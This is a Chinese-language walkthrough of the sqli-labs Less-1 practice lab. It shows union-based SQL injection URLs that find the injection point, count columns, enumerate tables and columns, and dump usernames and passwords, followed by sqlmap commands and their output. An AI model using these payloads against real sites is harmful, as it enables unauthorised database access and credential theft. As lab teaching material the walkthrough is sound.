Sqli-labs_Less-1_GET-Error Based-Single Quotes

实验地址:http://web-labs.rinue.top/sqli-labs/Less-1/

0x01 手工注入

首先打开网址,打开这样一个界面:

Sqli-labs_Less-1_GET-Error Based-Single Quotes

 根据提示

Please input the ID as parameter with numeric value请输入ID作为带数值的参数

在地址栏中加入参数

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1

成功进入一个界面

Sqli-labs_Less-1_GET-Error Based-Single Quotes

 显示了登录名和密码;

在参数后加入单引号看是否存在注入点

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1‘‘=%27

出现以下报错信息

Sqli-labs_Less-1_GET-Error Based-Single Quotes

 说明存在注入点;

接下来开始猜字段数;

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1‘ and 1=2 union select 1 -- ‘http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201%20--%20%27‘=%27 =%20

报错:

The used SELECT statements have a different number of columns

继续

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1‘ and 1=2 union select 1,2 -- ‘

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,2 --%27

依然报上面的错

继续

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1‘ and 1=2 union select 1,2,3 -- ‘

此时

Sqli-labs_Less-1_GET-Error Based-Single Quotes

 说明找到了字段数,字段数为3

还可以利用 order by 来判断字段数

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20order%20by%201%20--%20%27
http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20order%20by%202%20--%20%27
http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20order%20by%203%20--%20%27
order by 3 时候不报错

然后可以利用一些数据库函数获取一些信息

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,database(),version()%20--%20%27

Sqli-labs_Less-1_GET-Error Based-Single Quotes

 得到了当前的数据库名为security

当前数据库系统的版本号为:5.5.57_log,百度后,发现是mysql数据库

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,database(),user()%20--%20%27

Sqli-labs_Less-1_GET-Error Based-Single Quotes

 这样可以得到当前用户的的用户名;

现在,开始获取security下的表名:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,TABLE_NAME,user()%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_SCHEMA=%27security%27%20--%20%27

Sqli-labs_Less-1_GET-Error Based-Single Quotes

 只显示了一个表;

可以加入limit  显示其他的表;LIMIT m,n : 表示从第m+1条开始,取n条数据;

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,3,TABLE_NAME%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_SCHEMA=%27security%27%20limit%203,10%20--%20%27

Sqli-labs_Less-1_GET-Error Based-Single Quotes

 不过,这样太过麻烦了;

可以用group_concat(),把这些表一起连接到一起;

一 concat()函数

1、功能:将多个字符串连接成一个字符串。

2、语法:concat(str1, str2,...)  

返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null。

3、语法:concat(str1, seperator,str2,seperator,...)

返回结果为连接参数产生的字符串并且有分隔符,如果有任何一个参数为null,则返回值为null。

二 concat_ws()函数

1、功能:和concat()一样,将多个字符串连接成一个字符串,但是可以一次性指定分隔符(concat_ws就是concat with separator)

2、语法:concat_ws(separator, str1, str2, ...)

说明:第一个参数指定分隔符。需要注意的是分隔符不能为null,如果为null,则返回结果为null。

三 group_concat()函数

1、功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

2、语法:group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc  ] [separator ‘分隔符‘] )

说明:通过使用distinct可以排除重复值;如果希望对结果中的值进行排序,可以使用order by子句;separator是一个字符串值,缺省为一个逗号。

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,group_concat(distinct%20TABLE_NAME%20separator%20%22%20%22)%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_SCHEMA=%27security%27%20--%20%27" =%22

Sqli-labs_Less-1_GET-Error Based-Single Quotes

获取user表的字段

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,group_concat(column_name%20separator%20%22%20%22)%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_SCHEMA=%27security%27%20%20and%20TABLE_NAME=%27users%27--%20%27

Sqli-labs_Less-1_GET-Error Based-Single Quotes

 然后获取,字段的值

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,group_concat(username,%27:%27,password)%20from%20security.users--%20%27

Sqli-labs_Less-1_GET-Error Based-Single Quotes

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,group_concat(concat_ws(%27%20%20%27,username,password))%20from%20security.users--%20%27

Sqli-labs_Less-1_GET-Error Based-Single Quotes

方法二 SQLmap

sqlmap -u "web-labs.rinue.top/sqli-labs/Less-1/?id=1" --batch -D "security" --tables
Database: security                                                                       
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

显示 users 表

sqlmap -u "web-labs.rinue.top/sqli-labs/Less-1/?id=1" --batch -D "security" -T users --dump
Database: security                                                                       
Table: users
[13 entries]
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | Dumb     | Dumb       |
| 2  | Angelina | I-kill-you |
| 3  | Dummy    |    |
| 4  | secure   | crappy     |
| 5  | stupid   | stupidity  |
| 6  | superman | genious    |
| 7  | batman   | mob!le     |
| 8  | admin    | admin      |
| 9  | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+

相关推荐